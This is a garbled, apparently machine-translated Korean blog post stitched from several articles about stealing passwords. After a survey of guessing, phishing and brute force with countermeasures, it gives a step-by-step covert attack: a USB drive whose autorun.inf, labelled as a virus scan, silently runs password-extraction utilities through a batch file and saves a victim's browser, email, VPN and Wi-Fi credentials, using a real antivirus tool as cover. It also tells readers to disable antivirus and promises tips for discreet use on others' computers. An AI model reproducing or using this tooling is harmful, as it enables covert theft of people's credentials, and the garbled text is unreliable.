모든 비밀번호를 훔치는 방법. 비밀번호를 도난당하는 방법

모두에게 좋은 하루 되세요. 새해를 앞둔 바쁜 일정과 겨울 방학이 끝났고 이제 블로그에 글을 쓸 시간입니다. 저는 올해의 첫 번째 게시물을 이전 게시물 중 하나인 비밀번호 도용 방법에 대한 교육 프로그램에 바치고 싶습니다. "해킹"을 당하면 모든 비밀번호를 변경하기 위해 서두르지 않아도 됩니다. 이 자료는 정보 보안 분야의 비전문가를 대상으로 하며 정보 제공 목적으로만 제공된다는 점을 즉시 명확히 할 가치가 있습니다. 아마도 전문가들도 스스로 새로운 것을 배울 것입니다.

모든 사람이 비밀번호를 아무리 싫어하더라도 이는 오늘날까지 가장 널리 사용되는 식별 수단으로 남아 있지만 불행히도 때로는 비밀번호가 도난당하는 경우도 있습니다. 이중 인증은 문제 해결에 부분적으로 도움이 되지만 가장 중요한 서비스에만 부분적으로만 도움이 됩니다.

통계에 따르면 계정에 대한 통제력 상실의 가장 일반적인 이유는 간단한(사전) 비밀번호 사용과 사회 공학이라는 두 가지입니다. 이 기사에서는 광범위한 청중 사이에서 이 문제에 대한 인식을 높이기 위해 자연스럽게 비밀번호를 해킹하는 주요 방법에 대해 이야기하겠습니다(파괴적인 목적으로 자료를 사용하는 것은 법으로 처벌되며 작성자는 책임을 지지 않으며 어쩌고 저쩌고) ).

  1. 추측

예, 아주 간단합니다. 귀하의 비밀번호는 어리석게 추측될 수 있습니다. 헐리우드 영화에서 캐릭터가 누군가의 컴퓨터를 해킹하고 피해자의 자녀, 조부모, 삼촌, 이모, 피해자의 애완동물 이름 등의 이름을 비밀번호로 시도하는 모든 에피소드를 기억하십니까? 따라서 이것은 실제로 가장 효과적인 해킹 방법 중 하나이며, 이 구식 방법은 여전히 ​​​​효과적입니다. 결국 이제 모든 사람이 소셜 네트워크에 자신에 대한 수많은 정보를 게시하고 있으며, 비밀번호가 해킹당한 계정 소유자의 신원과 관련된 일부 데이터를 기반으로 하는 경우 비밀번호를 선택하는 것은 시간 문제입니다. 비밀번호를 주기적으로 변경해야 하는 이유)

방법에 대한 대응: 일반적으로 Tanyushka가 귀하가 아니라 사랑하는 손녀인 경우에도 "tanyushka1990"은 잘못된 비밀번호라는 점을 이해하시기 바랍니다. 직관적으로 추측할 수 없는 비밀번호를 사용하세요. 적어도 중요한 계정의 경우 비밀번호를 주기적으로(최소 1년에 한 번) 변경하세요.

  1. 사회 공학

사회 공학은 상당히 광범위한 개념입니다. 소셜 엔지니어는 피해자와 직접 또는 전화로 상호 작용할 수 있지만 대부분 인스턴트 메신저, 소셜 네트워크, 이메일 등 전자 통신 채널을 통해 상호 작용합니다. 그리고 여기서는 사회 공학의 방법을 고려하지 않을 것입니다. 여기서는 V. Simon과 K. Mitnick의 "The Art of Deception"이라는 장르의 고전을 읽는 것이 좋습니다. 여기서 중요한 것은 비밀번호 도용과 관련된 사회 공학적 방법은 피해자가 자신의 비밀번호를 포기하도록 강요하는 것을 목표로 한다는 것입니다. 한 가지 예는 다음과 같습니다. 공격자는 자신을 새로운 시스템 관리자라고 소개하고 조직의 직원에게 구형 진공 테스트를 수행하려면 직원의 이메일에 대한 비밀번호가 필요하다고 말합니다. 공격자와 피해자 사이에 개인적인 접촉이 없는 또 다른 예: 피싱 링크와 경고 메시지가 포함된 팬 메일(예: 계정이 신고되었고 차단되었으며 링크를 따라가야 합니다) 차단을 해제하세요). 피싱 링크는 공격자가 미리 준비한 페이지로 연결되며 vk.com, gmail.com, facebook.com 등과 같은 일부 인기 서비스의 인증 페이지와 유사한 일대일 페이지로 연결됩니다. 다음 단계는 다음과 같습니다. 피해자는 이것이 합법적인 서비스라고 생각하고 귀하의 사용자 이름과 비밀번호를 입력하고 이러한 식별 데이터가 공격자에게 전송되고 오류 메시지가 표시됩니다. !) 그런 다음 사용자는 실제 인증 페이지로 리디렉션됩니다. 왜냐하면 더러운 행위가 이미 수행되었고 피해자를 가짜 페이지에 가두어 둘 필요가 없기 때문입니다. 그런데 Windows에서 로그인하기 전에 Alt-Ctrl-Del 키 조합을 누르라고 요청하는 이유를 다른 사람이 모른다면 Google에서 해당 내용을 읽어 보시기 바랍니다.

대응 방법: 일반적으로 기업은 사회 공학에 대응하기 위해 하이브리드 방법을 사용하지만(자연스럽게 정보 보안 문제를 일반적으로 우려하는 기업에서는), 사회 공학자는 의사소통을 사용하지 않고도 피해자와 상호 작용할 수 있으므로 이를 이해해야 합니다. 채널을 통해(따라서 우리는 그의 메시지를 필터링, 차단 또는 추적할 수 없습니다), 진정으로 효과적인 대응 방법은 직원(개인 안전에 관해 이야기하는 경우 개인 또는 본인)에게 다음 사항을 알리는 것입니다. 사회공학적 방법. 결국 요즘에는 나이지리아 왕자의 상속이나 이혼에 빠지는 사람이 거의 없을 것입니다. “엄마, XXXX 번으로 돈을 보내주세요. 나중에 설명하겠습니다.”그러나 이러한 방법은 한때 효과가 있었습니다.

  1. 관음증

여기서는 모니터에 붙어 있는 스티커나 키보드 아래 종이에 있는 비밀번호와 같은 명백한 사항에 대해서만 간략하게 언급하겠습니다. 여기서 스파이는 비밀번호를 입력하는 과정을 염탐하는 행위로도 이해될 수 있습니다. 즉, 비밀번호는 아무도 지켜보지 않을 때 입력하는 것이 좋다. 흥미로운 능력을 가진 사람들이 있습니다. 예를 들어, 내 친구 중 한 명이 내가 노트북에 비밀번호를 입력하는 것을 지켜본 다음 직접 비밀번호를 반복할 것이라고 내기했습니다. 그리고 그는 실제로 그것을 반복했습니다. 열 손가락 터치 타이핑을 알고 비밀번호를 매우 빠르게 입력할 수 있어서 매우 놀랐습니다. 내 친구는 특별한 사진 기억력을 가지고 있다는 것이 밝혀졌습니다. 위험한 남자 =)

즉, 엿보기는 공격자가 아래에서 설명할 더 복잡하거나 리소스 집약적인 다른 기술에 의존하지 않고 기성 비밀번호를 신속하게 얻는 데 도움이 됩니다. 하지만 비밀번호를 '눈으로' 엿보는 것만이 유일한 방법은 아닙니다. 예를 들어, 다른 사람의 컴퓨터에 비밀번호를 입력하고 실수로 비밀번호를 저장한 경우, 계정에서 로그아웃했지만 데이터를 삭제하지 않은 경우, 다른 사람이 비밀번호를 모르고 계정에 로그인할 수 있을 뿐만 아니라(그렇게 나쁘지는 않습니다) ), 사용자 이름과 비밀번호가 입력되는 페이지의 브라우저 주소 표시줄에 이 간단한 스크립트를 삽입하여 명시적으로 이 비밀번호를 찾아냅니다(별표로 위장).

javascript:(function())(var%20s,F,j,f,i;%20s%20=%20%22%22; %20F%20=%20document.forms;%20for(j=0;% 20j

[무너지다]

해당 비밀번호가 다른 계정에서 사용되면 공격자는 해당 계정에도 액세스할 수 있습니다. 그렇기 때문에 보안 전문가들은 서로 다른 계정에 동일한 비밀번호를 사용하는 것을 절대 권장하지 않습니다.

대처방법: 옆에 누군가가 서서 손을 쳐다볼 때 비밀번호를 입력하지 마세요. 신뢰할 수 없는 장치에 비밀번호를 입력하지 마세요. 그래도 삭제해야 한다면 비밀번호와 쿠키에 대한 정보를 주의 깊게 삭제하세요. 또한 신뢰할 수 없는 장치에 키로거를 설치할 수도 있습니다.

  1. 사전을 사용하여 비밀번호 선택

우리는 직관적이고 사기성 비밀번호 도용 기술에서 기술적인 기술로 원활하게 전환했습니다. 첫 번째는 사전을 사용하여 비밀번호를 선택하는 것입니다. 아마도 정보 보안 분야의 비전문가라도 다양한 메일 서비스의 사서함에 대한 대규모 비밀번호 유출 소식을 접했을 것입니다. 나중에 밝혀졌듯이 이러한 유출의 대부분은 서비스 제공업체의 서버 해킹이 아니라 사전을 사용하여 사서함에 대한 비밀번호를 평범하게 선택하는 것과 관련이 있었습니다. 해킹된 메일함의 비밀번호는 대부분 '123456', 'qwerty' 등의 조합이었다. "재료" 섹션에는 John the Ripper 또는 Hydra와 같은 다양한 도구에서 사용하거나 일반 검색을 통해 비밀번호가 맞는지 확인하는 데 사용할 수 있는 비밀번호가 포함된 사전 몇 개를 게시했습니다(직접 작성 가능). 사전에. 있다면 긴급히 변경하겠습니다!

대응 방법: 복잡하고 사전이 아닌 비밀번호를 사용합니다.

  1. 무차별 대입

이 방법의 이름은 두 개의 영어 단어인 brute(brute)와 force(force)에서 유래되었습니다. 이름에서 이 방법이 이전 방법과 어떻게 다른지 직관적으로 분명합니다. 여기서는 가능한 모든 비밀번호 조합을 간단히 시도합니다. 이 방법을 사용하여 선택하려면 상당한 컴퓨팅 리소스가 필요하기 때문에 이 방법은 시간과 리소스를 많이 소모합니다. 따라서 공격자는 극단적인 경우에만 이 방법을 사용합니다. 예를 들어, 비밀번호의 정확한 길이를 알거나 비밀번호에 특수문자나 숫자가 절대 포함되지 않는다는 사실을 알면 선택 시간을 줄일 수 있습니다. 이렇게 하면 가능한 조합 수가 줄어듭니다.

대책: 길고 혼란스러운 비밀번호를 사용하고 정기적으로 비밀번호를 변경합니다.

  1. 레인보우 테이블

최근 몇 년 동안 어떤 서비스에서든 비밀번호를 복구해야 했던 사람이라면 이전에 일부 서비스에서 단순히 이메일로 비밀번호를 보냈었다면 이제는 즉시 새 비밀번호를 찾아야 한다는 사실을 알아차렸을 것입니다. 이는 자존심이 강한 서비스가 비밀번호를 일반 텍스트로 저장하지 않기 때문입니다. 비밀번호는 해시 형태로 저장됩니다. 간단히 말해서, 해시는 되돌릴 수 없는 수학 함수를 통해 텍스트(이 경우 비밀번호)를 변환한 결과입니다. 일반적인 MD5 알고리즘을 사용하여 "password"라는 단어(따옴표 없이)를 변환한 결과는 다음과 같습니다. 이는 서비스 제공업체가 당사의 비밀번호를 저장하는 대략적인 방법이며, 해당 기능은 되돌릴 수 없는 것으로 간주되므로 제공업체 자체는 당사의 비밀번호를 알 수 없으며 이를 일반 텍스트로 당사에 보낼 수 없는 것으로 보입니다. 해싱에 대해 자세히 알아볼 수 있습니다.

대략적으로 말하면 레인보우 테이블을 사용하면 해시를 사용하여 비밀번호를 복구할 수 있습니다. 물론 전체 프로세스는 보이는 것보다 훨씬 더 복잡합니다. 따라서 이 기술에 대해 더 자세히 알아보고 싶은 사람들은 Wikipedia 페이지부터 시작해 보세요. 레인보우 테이블을 사용하면 거의 모든 비밀번호를 해독할 수 있을 것 같지만 공격자에게는 이 또한 나름대로의 어려움이 있습니다. 무차별 대입으로 검색 자체에 시간과 리소스가 필요한 경우 레인보우 테이블의 경우 바로 이러한 테이블을 생성하는 데에도 동일한 시간과 리소스가 필요합니다. 또한 모든 레인보우 테이블 세트에는 비밀번호 길이 제한, 문자 세트 제한, 특정 해싱 알고리즘 제한 등 많은 제한 사항이 있습니다. 공개 도메인의 인터넷에서는 6자 이하의 비밀번호를 선택하기 위한 레인보우 테이블을 찾을 수 있습니다. 이 테이블에는 두 레지스터의 영어 알파벳 문자만 포함되지만 특수 문자와 숫자는 포함되지 않습니다. 그러나 이제 그들은 더 심각한 일을 위해 돈을 요구하고 있습니다.

대책: 해시를 소금에 절이는 것. 불행하게도 이러한 유형의 대응은 서비스 관리자 수준에서만 가능하며 최종 사용자의 작업에 전혀 의존하지 않습니다.

  1. 하이브리드 방법

하이브리드(Hybrid) 방식이란 위에서 제시한 다양한 방식들을 함께 조합한 것을 의미한다. 실제로 "무차별 대입" + "엿보기" 방법을 사용하는 예는 이미 위에 나와 있습니다. 예를 들어, 공격자는 전체 비밀번호를 볼 수 없고 비밀번호를 구성하는 문자만 볼 수 있습니다. 이렇게 하면 무차별 대입 중에 매개변수에 필요한 기호만 지정하고 다른 모든 기호는 검색에서 제외할 수 있으므로 가능한 조합 수가 크게 줄어듭니다.

하이브리드 방법의 또 다른 예: 사전에 있는 단어를 가져와 그 안에 있는 문자를 특수 문자로 바꾸는 것입니다. 예를 들어, 사전 비밀번호 "password"를 사용하여 "password123", "p@ssword", "pa$$w0rd" 등의 조합을 시도해 보십시오.

하이브리드 방법에 대응하려면 위에 나열된 모든 대책을 사용하는 것이 포함됩니다.



진짜징역형!

컴퓨터에 액세스할 수 있지만 피해자가 아무 것도 의심하지 않으면서 컴퓨터에서 비밀번호를 훔칠 수 있는 방법을 알아내도록 합시다.

한 가지 방법은 사용자 편의를 위해 비밀번호를 저장하는 브라우저 및 기타 프로그램에서 비밀번호를 추출할 수 있는 유틸리티를 사용하여 특수 플래시 드라이브를 만드는 것입니다.

필요한 비밀번호 복구 유틸리티를 다운로드해 보겠습니다.

* MessenPass - MSN Messenger, Windows Messenger(Windows XP), Windows Live Messenger(Windows XP 및 Vista), Yahoo Messenger(버전 5.x/6.x), ICQ Lite 4 등 가장 널리 사용되는 인스턴트 메시징 프로그램의 비밀번호를 복구합니다. .x/5.x/2003, AOL 인스턴트 메신저, AIM 6.x, AIM Pro, Trillian, Miranda 및 GAIM;

* Mail PassView - 이메일 클라이언트에서 저장된 비밀번호 검색: Outlook Express, Microsoft Outlook 2000(POP3/SMTP 계정만 해당), Microsoft Outlook 2002/2003/2007, Windows Mail, IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free, 웹 기반 이메일 계정;

* IE Passview - "당나귀"가 저장한 로그인 및 비밀번호를 표시합니다.

* ChromePass - Google Chrom 브라우저에 저장된 로그인 및 비밀번호를 표시합니다.

* PasswordFox - Firefox에 저장된 모든 비밀번호를 받습니다.

* 보호 저장소 PassView - 보호 저장소에 저장된 모든 비밀번호를 복구합니다.

* Dialupass - 모든 전화접속/VPN 세션 비밀번호를 검색합니다.

* 네트워크 비밀번호 복구 - 로컬 네트워크 공유에 사용하는 비밀번호와 .NET Passport/Messenger 계정 비밀번호를 표시합니다.

* PstPassword - Outlook 개인 폴더 파일(.PST)에서 비밀번호를 추출합니다.

* WirelessKeyView - 컴퓨터에 저장된 모든 무선 네트워크 키(WEP/WPA)를 복구합니다.

OperaPassView라는 유틸리티도 있지만 아직 명령줄을 지원하지 않습니다. 따라서 우리 세트에는 포함하지 않습니다.
모든 유틸리티를 사용할 수 있습니다.

Hidden Start() 유틸리티도 필요합니다.

유틸리티를 위장하기 위해 다운로드할 수도 있습니다. 비밀번호 추출 작업이 끝나면 실행하겠습니다. 그리고 피해자는 화면에서 그의 작업만 볼 수 있습니다.

플래시 드라이브를 준비합니다.

1. 플래시 드라이브에 두 개의 폴더를 만듭니다.
플래시 드라이브:\prog\
플래시 드라이브:\prog\log\

2. 플래시 드라이브 폴더:\prog\에서 모든 실행 파일(유틸리티, hstart.exe, KK.exe)을 업로드합니다.

3. 플래시 드라이브의 루트에 다음 내용으로 autorun.inf를 생성합니다.


open=prog/hstart /NOCONSOLE "launch.bat"
ACTION= 컴퓨터에서 바이러스를 검사하세요


여기서 action은 플래시 드라이브가 연결되었을 때 동작 선택 창에 표시되는 버튼이고, open은 이 동작이 선택되었을 때 실행해야 하는 명령입니다. 이 명령에는 숨겨진 시작 유틸리티를 사용하여 숨겨진 모드에서 배치 파일을 시작하는 것이 포함됩니다.

4. 배치 파일 launch.bat를 생성합니다.

에코 꺼짐
echo %computername%\%username% bte% %time% >> prog/log/_log.txt
prog/ChromePass.exe /stext prog/log/%computername%_chrom.txt 시작
prog/Dialupass.exe /stext prog/log/%computername%_dialupass.txt 시작
prog/iepv.exe /stext prog/log/%computername%_iepv.txt 시작
prog/mailpv.exe /stext prog/log/%computername%_mailpv.txt 시작
prog/mspass.exe /stext prog/log/%computername%_mspass.txt 시작
prog/netpass.exe /stext prog/log/%computername%_netpass.txt 시작
prog/pspv.exe /stext prog/log/%computername%_pspv.txt 시작
prog/PstPassword.exe /stext prog/log/%computername%_pstpassword.txt 시작
prog/WirelessKeyView.exe /stext prog/log/%computername%_wirelesskeyview.txt 시작

존재하지 않는 경우 "%programfiles%\Mozilla Firefox\" 이동 끝
prog/PasswordFox.exe /stext prog/log/%computername%_passwordfox.txt 시작
:끝
prog/KK.exe 시작

배치 파일 명령을 자세히 살펴보겠습니다.

echo off – CMD 창에 실행 결과 표시 금지

echo %computername%\%username% Ъte% %time% >> prog/log/_log.txt – 컴퓨터 이름, 사용자 이름, 날짜 및 시간을 prog/log/_log.txt 파일에 씁니다.

start prog/ChromePass.exe /stext prog/log/%computername%_chrom.txt – 실행 시 비밀번호를 prog/log/computername_chrom.txt 파일에 저장해야 하는 ChromePass.exe 유틸리티를 실행합니다.

다른 유틸리티에서도 마찬가지입니다. 유일한 참고 사항은 PasswordFox.exe를 실행하기 전에 피해자의 컴퓨터에 FF가 설치되어 있는지 확인한다는 것입니다. FF가 설치되지 않은 경우 PasswordFox.exe 유틸리티가 오류 메시지를 표시합니다.

start prog/KK.exe – Kaspersky Lab에서 Net-Worm.Win32.Kido 웜을 제거하기 위한 실제 유틸리티를 실행하여 작업을 위장합니다.

그게 다입니다. 플래시 드라이브가 준비되었습니다. 이제 공격자는 플래시 드라이브를 피해자의 컴퓨터에 연결하고 해당 컴퓨터에 저장된 모든 비밀번호를 검색하는 팝업 창에서 "컴퓨터 바이러스 검사"를 선택하기만 하면 됩니다. "바이러스 검사"를 실행하는 이유는 매우 간단합니다. 특히 피해자가 귀하를 신뢰하는 경우 더욱 그렇습니다.

싸우는 방법?

1. 비밀번호를 저장하지 마세요. Password Keeper나 eWallet과 같은 프로그램을 사용하는 것이 좋습니다.

3. 좋은 바이러스 백신을 갖추는 것은 필수입니다! 그는 이러한 유틸리티 중 몇 가지에만 맹세할 것입니다.

이 글을 쓰게 된 계기는 '해커'라는 잡지에 실린 기사 때문이었습니다.

이 글은 정보 제공의 목적으로만 작성되었습니다.
그 목적은 공격자로부터 데이터를 보호하는 것입니다.
아는 사람은 무장한다!

타인의 비밀번호를 도용하는 경우 제1조에 따라 형사책임을 지게 됩니다. 러시아 연방 형법 272 "컴퓨터 정보에 대한 불법 접근" 및 위협 진짜징역형!

범죄자들은 ​​소셜 네트워크 페이지, 온라인 게임, 결제 시스템 등 모든 종류의 네트워크 리소스에 대한 사용자 비밀번호를 훔치기 위해 최선을 다합니다. 온라인 신원 도용 통계는 놀라운 숫자로 가득 차 있습니다. 계정을 분실한 피해자에 속하지 않기 위해 해커가 사용하는 비밀번호를 훔치는 주요 방법을 살펴보겠습니다. 이러한 악의적인 "기술"을 이해하면 개인 데이터의 적절한 보안 수준과 기밀성을 유지하면서 효과적으로 대응할 수 있습니다.

정의와 복수의 승리는 수유 기간 동안 발생합니다. 흰 요정 병아리는 부모가 부리에 간식을 물고 둥지에 접근하는 것을 보고, 인생의 첫날에 노래하도록 배운 것과 동일한 트릴을 최대한 세게 울리기 시작합니다. '토착모티프' 출연자들만이 법적 상속자가 되며, 뻐꾸기 새끼들은 아무것도 남지 않고 곧 굶어 죽는다.

언뜻보기에 이것은 자연의 생생한 그림이지만 끝없이 펼쳐진 인터넷 디지털 정글과 얼마나 유사한가요? 여기에도 비밀번호가 있습니다. 그리고 악한 캐릭터와 선한 캐릭터, 해커와 일반 사용자가 있습니다.

따라서 독자 여러분, 사악한 사람들로부터 소중한 로그인과 비밀번호를 보호하기 위해 물론 트릴을 배울 필요는 없습니다. 그러나 개인 데이터를 훔치는 방법에 대해 알아가는 것은 결코 불필요한 일이 아닙니다... 평화를 원하십니까? 전쟁을 준비하세요!

이 방법에서 공격자의 주요 무기는 사용자의 순진함과 과도한 호기심이다. 정교한 소프트웨어 방법, 교활한 바이러스 또는 기타 해커 기술이 없습니다.

메일함의 로그인 정보만 알고 있는 악당은 이를 서비스 로그인 폼에 입력한다. 그런 다음 그는 시스템에 자신의 비밀번호를 잊어버렸다고 알립니다. 보안 질문이 모니터에 표시됩니다. 도둑은 이에 대한 답을 모르지만 내용은 이미 알고 있습니다. 여기서 "흥미로운" 부분이 시작됩니다. 그는 질문의 주제에 따라 피해자에게 가려진 형태로 정답을 찾으려고 노력하는 "교활한 편지"를 보냅니다. 교활한 메시지는 다음과 같을 수 있습니다. “안녕하세요! 우리, 요리 사이트 등등 ..... 등등. 당신이 가장 좋아하는 요리는 무엇입니까? 그리고 이것은 단지 별개의 예일 뿐입니다. 이런 종류의 트릭은 "인터넷을 돌아 다니는 것"입니다위대한 신 . 우리는 기사에서 사회 공학에 대해 더 자세히 썼습니다. 그러니 편지를 읽을 때 눈을 크게 뜨고 읽으세요!

쿠키 도난

쿠키(영어 "쿠키"에서 유래 - 쿠키)는 웹사이트가 사용자 브라우저에 저장하는 세션 데이터가 포함된 파일입니다. 온라인 작업 중에 리소스가 주기적으로 액세스하는 로그인, 비밀번호, ID 및 기타 정보를 해시된 형식으로 저장합니다.

특정 사이트(포럼, 이메일 서비스, 소셜 네트워크)의 취약점을 알고 있는 해커는 피해자의 브라우저에서 쿠키를 "가져와" 피해자에게 보내는 특수 스크립트를 작성합니다. 이 "더러운 행위"는 계정 소유자의 참여 없이는 이루어질 수 없습니다. 악성 스크립트를 실행해야 하는 사람은 바로 계정 소유자이기 때문입니다. 따라서 전송하기 전에 코드는 사진, 유혹적인 편지, 요청 등 특별한 "미끼"로 포장됩니다. 주요 임무는 피해자가 제공된 링크를 따라가는 것입니다. 그리고 이런 일이 발생하면 해커 스크립트는 브라우저에서 타사 호스팅에 설치된 스니퍼(네트워크 트래픽 인터셉터)로 쿠키를 전송합니다. 그런 다음 사용자를 메시지에서 약속된 위치(데이트 사이트, 비디오 호스팅, 사진 갤러리 등)로 안내합니다. 당연히 계정 소유자는 이러한 조작에 대해 아무것도 의심하지 않습니다. 배신적인 절차는 단 5초만 걸립니다.

무차별 공격자를 코로 남겨두려면 복잡한 암호를 만들고 사용하십시오.

Windows에서 비밀번호를 훔치는 방법.

안녕하세요 여러분, 오늘은 많은 사람들이 관심을 가질 것 같은 또 다른 주제를 다루겠습니다. Windows에 저장된 모든 비밀번호를 표시하고 저장할 수 있는 특수 도구를 만들어 보겠습니다. 당신 또는 다른 사람의 것. 간단히 말해서, 비밀번호를 훔치다 .

주제를 전개해 봅시다. 어떤 브라우저를 사용하시나요? 창문에는 몇 개가 있나요? 어리석은 질문: 소셜 네트워크를 사용하시나요? 다른 사회 프로젝트? 우리 각자는 그러한 자원을 꽤 많이 가지고 있습니다. 각각에는 동일한 브라우저에 저장된 비밀번호가 필요합니다. 편안해요. 그러나 그것은 안전하지 않습니다. 이제 그 이유를 알게 될 것입니다. 다음을 허용하는 유틸리티가 있습니다. 비밀번호를 훔치다 브라우저에서웹사이트에 대한 모든 스트라이프의.

라우터 비밀번호를 잊으셨나요? 아니면 별도의 케이블이 있나요? 차이 없음 - 패키지에 포함된 유틸리티를 사용하면 인터넷 비밀번호를 훔치다. 힘들게 번 돈으로 Windows를 정직하게 구입하셨나요? 구입한 컴퓨터와 노트북에 설치되어 있나요? 그러나 온라인에 접속할 때마다 Windows는 데이터베이스에서 작업 결과를 확인합니다. 인증을 위해서는 고유한 Windows 정품 인증 키가 필요합니다. 저장 위치에 대해서도 이야기하겠습니다. 다음을 허용하는 유틸리티가 있습니다. 시스템 키와 비밀번호를 훔치다. 패키지의 열쇠도 있습니다. 마이크로 소프트 오피스…

전체보기에서…

컴퓨터에 이메일 클라이언트가 있나요? 마이크로소프트 아웃룩, 파일질라, 모질라 썬더버드? 메일에 로그인하면 메일 클라이언트는 사서함의 비밀번호를 메일 서버 서버로 보냅니다... 다음을 허용하는 유틸리티가 있습니다. 사서함의 비밀번호를 훔치다.

이제 몇 번의 마우스 클릭만으로 창에서 가장 비밀스러운 정보를 꺼내는 방법을 보여 드리겠습니다.

그리고 모든 형태의 원격 프로그램 및 브라우저에 대한 비밀번호도 제공됩니다.

Windows에서 비밀번호를 훔치는 방법은 무엇입니까?

우리는 다음의 프로그램을 사용할 것입니다. NirSoft.개발자에게는 "유용한" 유틸리티가 많이 있습니다. 이제 특정 작업에서 우리에게 도움이 될 것들을 고려해 보겠습니다. 제시된 모든 프로그램에는 휴대용 버전이 있으며 설치가 필요하지 않습니다. 제조업체 웹사이트에서 Russification 파일을 다운로드할 수 있습니다. 시스템에서 비밀번호를 훔치다, 그다지 중요하지 않습니다.

Windows에서 "비밀번호를 훔치려면" 다음이 필요합니다.

  • 무료 플래시 드라이브(비밀번호를 검색하기 위해 "날카롭게" 처리한 후에도 의도된 목적으로 사용할 수 있음)
  • 프로그램 자체 모음(내 웹사이트에서 직접 다운로드할 수 있음)
  • 메모장 문서를 사용한 몇 가지 조작.
  • 이러한 프로그램 중 절반은 브라우저에서 다운로드하는 단계에서도 "악성 프로그램"으로 식별됩니다. 바이러스 백신에 대해 무엇을 말할 수 있습니까? 따라서 만든 도구를 사용하기 전에 바이러스 백신을 비활성화해야 합니다.
  • 일부 유틸리티를 실행하려면 관리자 권한이 필요합니다

나는 다운로드한 어셈블리에 바이러스가 없음을 보증합니다. 그러나 프로그램의 작동 특성은 스니퍼의 행동과 유사합니다. 따라서 안티 바이러스는 여러 번 "문제"를 보고합니다.

일을 시작합시다.

  • 바이러스 백신을 비활성화합시다. 일시적으로.
  • . 나는 최소한 시간을 벌고 그러한 프로그램을 좋아하지 않는 검색 엔진에 의해 금지되지 않기 위해 두 번 패키지했습니다. 아카이브 비밀번호

컴퓨터76

  • 플래시 드라이브를 준비합시다. 예, 요리할 것이 없습니다. 공간이 거의 필요하지 않습니다. 왜 플래시 드라이브인가? 휴대가 가능하고 때로는 크기가 작으며 눈에 띄지 않는 경우도 있습니다. 귀하의 조작은 커피를 마시기 위해 부엌에 가야 하는 피해자에게도 눈에 띄지 않을 수 있습니다.
  • USB 플래시 드라이브에 프로그램의 압축을 풉니다. 폴더가 아닌 직접 경로에 있으므로 플래시 드라이브를 열 때 사용할 수 있습니다. 압축을 푼 유틸리티는 다음과 같은 이름의 bat 파일을 한꺼번에 실행합니다. 시작 .

이 bat 파일은 일반 메모장에서 생성되었습니다. , 여기를 읽어보세요. 이 문서에는 유틸리티를 자동으로 실행하고 적절한 텍스트 파일에 저장하는 코드가 포함되어 있습니다. 동일한 메모장을 사용하여 이름을 바꾸고 구성을 볼 수 있습니다.

배치 파일을 실행한 후, 각 프로그램은 귀하(또는 다른 사람)의 모든 비밀번호가 포함된 별도의 창에서 열리거나 발견된 비밀번호가 표시될 텍스트 파일을 생성하려고 시도합니다. 오페라, 파이어폭스, 인터넷 익스플로러, 이메일 클라이언트 및 자체 윈도우. 모든 작업에는 몇 초가 걸립니다. 컴퓨터로 천천히 연습해보세요.

다음 기사 중 하나에서 습득한 기술을 다른 사람의 컴퓨터에서 정확하고, 빠르고, 최대한 신중하게 사용하는 방법을 살펴보겠습니다.

읽다: 321

공유하다